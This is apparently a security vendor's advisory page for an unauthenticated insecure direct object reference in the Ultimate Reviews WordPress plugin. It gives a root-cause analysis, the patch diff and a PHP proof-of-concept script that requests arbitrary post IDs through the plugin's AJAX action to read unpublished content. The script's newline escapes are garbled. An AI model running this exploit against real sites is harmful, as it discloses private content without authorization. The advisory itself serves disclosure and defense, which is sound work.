Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-24634: Ultimate Reviews <= 3.2.16 – Unauthenticated Insecure Direct Object Reference (ultimate-reviews)

CVE ID CVE-2026-24634
Plugin ultimate-reviews
Severity Medium (CVSS 5.3)
CWE 639
Vulnerable Version 3.2.16
Patched Version 3.2.17
Disclosed January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24634:
This vulnerability is an unauthenticated Insecure Direct Object Reference (IDOR) in the Ultimate Reviews WordPress plugin. The flaw allows attackers to retrieve the full content of any review post, regardless of its publication status, by manipulating a user-controlled parameter. The CVSS score of 5.3 reflects a medium severity impact.

The root cause is missing validation on the `review_id` parameter in the `ewd_urp_ajax_read_more` function within `/ultimate-reviews/includes/Ajax.class.php`. The vulnerable code at line 173 accepts a POST parameter `review_id` and directly uses it in `get_post_field()` without verifying the post type matches `EWD_URP_REVIEW_POST_TYPE` or checking the post’s publication status. This lack of authorization allows object reference manipulation.

Exploitation occurs via the WordPress AJAX endpoint `/wp-admin/admin-ajax.php`. Attackers send a POST request with `action=ewd_urp_ajax_read_more` and a manipulated `review_id` parameter. The payload consists of any integer value corresponding to a WordPress post ID. The attack requires no authentication or nonce, making it accessible to completely unauthenticated users.

The patch adds a validation check before processing the `review_id`. The new code at lines 175-177 verifies two conditions: the post type must equal `EWD_URP_REVIEW_POST_TYPE` and the post status must be ‘publish’. If either condition fails, the function calls `ewdurpHelper::admin_nopriv_ajax()`, which terminates execution. This restricts access to only published review posts of the correct type.

Successful exploitation allows attackers to read the full content of any review post, including drafts, private posts, or posts from other post types that share the same ID space. This leads to unauthorized information disclosure. While the vulnerability does not enable modification or deletion, it violates confidentiality by exposing unpublished content that should remain inaccessible to unauthenticated users.

Differential between vulnerable and patched code

Code Diff 
--- a/ultimate-reviews/includes/Ajax.class.php
+++ b/ultimate-reviews/includes/Ajax.class.php
@@ -173,6 +173,10 @@

 			$review_id = intval( $_POST['review_id'] );

+			if ( get_post_type( $review_id ) != EWD_URP_REVIEW_POST_TYPE or get_post_status( $review_id ) != 'publish' ) {
+				ewdurpHelper::admin_nopriv_ajax();
+			}
+
 			echo "<span class='ewd-urp-ajax-read-more-content'>";
 			echo wp_kses_post( apply_filters( 'the_content', get_post_field( 'post_content', $review_id ) ) );
 			echo "<span class='ewd-urp-ajax-read-less' data-thumbnailchars='" . esc_attr( $ewd_urp_controller->settings->get_setting( 'thumbnail-characters' ) ) . "'>" . __( 'Read Less', 'ultimate-reviews' ) . "</span>";
--- a/ultimate-reviews/ultimate-reviews.php
+++ b/ultimate-reviews/ultimate-reviews.php
@@ -7,9 +7,9 @@
 Author URI: https://www.etoilewebdesign.com/
 Terms and Conditions: https://www.etoilewebdesign.com/plugin-terms-and-conditions/
 Text Domain: ultimate-reviews
-Version: 3.2.16
+Version: 3.2.17
 WC requires at least: 7.1
-WC tested up to: 10.3
+WC tested up to: 10.4
 */

 if ( ! defined( 'ABSPATH' ) )
@@ -56,7 +56,7 @@
 		define( 'EWD_URP_PLUGIN_URL', untrailingslashit( plugin_dir_url( __FILE__ ) ) );
 		define( 'EWD_URP_PLUGIN_FNAME', plugin_basename( __FILE__ ) );
 		define( 'EWD_URP_TEMPLATE_DIR', 'ewd-urp-templates' );
-		define( 'EWD_URP_VERSION', '3.2.16' );
+		define( 'EWD_URP_VERSION', '3.2.17' );

 		define( 'EWD_URP_REVIEW_POST_TYPE', 'urp_review' );
 		define( 'EWD_URP_REVIEW_CATEGORY_TAXONOMY', 'urp-review-category' );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24634 - Ultimate Reviews <= 3.2.16 - Unauthenticated Insecure Direct Object Reference

<?php

$target_url = 'http://example.com/wp-admin/admin-ajax.php';

// The review_id to attempt to read. Attackers would iterate through IDs.
$review_id = 123;

// Prepare the POST data for the vulnerable AJAX action
$post_data = array(
    'action' => 'ewd_urp_ajax_read_more',
    'review_id' => $review_id
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check for successful exploitation
if ($http_code == 200 && !empty($response)) {
    echo "[+] Successfully retrieved content for review ID: $review_idn";
    echo "[+] Response:n$responsen";
} else {
    echo "[-] Failed to retrieve content for review ID: $review_idn";
    echo "[-] HTTP Code: $http_coden";
}

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School